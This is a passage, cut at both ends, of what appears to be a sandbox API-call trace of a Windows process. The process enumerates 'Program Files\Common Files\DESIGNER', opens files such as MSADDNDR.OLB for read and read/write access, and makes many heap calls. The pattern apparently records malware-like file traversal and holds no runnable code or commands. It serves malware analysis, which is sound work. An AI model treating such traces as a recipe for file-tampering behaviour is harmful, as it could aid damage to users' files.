Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0073.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0073.853] AreFileApisANSI () returned 1 [0073.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\DESIGNER", lpUsedDefaultChar=0x0) returned 39 [0073.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0073.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.854] AreFileApisANSI () returned 1 [0073.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d478 [0073.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER") returned 39 [0073.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER" (normalized: "c:\\program files\\common files\\designer"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.854] GetLastError () returned 0x5 [0073.854] GetLastError () returned 0x5 [0073.854] SetLastError (dwErrCode=0x5) [0073.854] GetLastError () returned 0x5 [0073.854] SetLastError (dwErrCode=0x5) [0073.854] GetLastError () returned 0x5 [0073.854] SetLastError (dwErrCode=0x5) [0073.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0073.854] AreFileApisANSI () returned 1 [0073.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d160 [0073.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6d160, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER") returned 39 [0073.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER" (normalized: "c:\\program files\\common files\\designer"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.855] GetLastError () returned 0x5 [0073.855] GetLastError () returned 0x5 [0073.855] SetLastError (dwErrCode=0x5) [0073.855] GetLastError () returned 0x5 [0073.855] SetLastError (dwErrCode=0x5) [0073.855] GetLastError () returned 0x5 [0073.855] SetLastError (dwErrCode=0x5) [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0073.855] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728da660, ftCreationTime.dwHighDateTime=0x1d5895c, ftLastAccessTime.dwLowDateTime=0x9caef5e0, ftLastAccessTime.dwHighDateTime=0x1d5ce38, ftLastWriteTime.dwLowDateTime=0x9caef5e0, ftLastWriteTime.dwHighDateTime=0x1d5ce38, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="far.exe", cAlternateFileName="")) returned 1 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0073.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0073.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0073.856] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x782d0 [0073.856] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.856] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 1 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0073.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0073.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0073.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0073.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0073.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0073.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0073.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.857] AreFileApisANSI () returned 1 [0073.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB", lpUsedDefaultChar=0x0) returned 52 [0073.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0073.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0073.857] AreFileApisANSI () returned 1 [0073.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0073.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0073.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0073.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0073.858] GetFileType (hFile=0x41c) returned 0x1 [0073.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0073.858] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0073.858] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0073.858] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0073.859] CloseHandle (hObject=0x41c) returned 1 [0073.859] AreFileApisANSI () returned 1 [0073.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0073.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0073.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46898, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0073.859] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0073.859] GetFileType (hFile=0x41c) returned 0x1 [0073.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0073.859] CloseHandle (hObject=0x41c) returned 1 [0073.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.861] AreFileApisANSI () returned 1 [0073.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0073.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0073.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 52 [0073.861] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8c3a00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aadd873, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70)) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0073.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.861] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.861] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x66, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x75fb0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x66, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\M", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㹰")) returned 0 [0073.861] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0073.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0073.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0073.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.861] HeapFree (in: hHeap=0x20000, 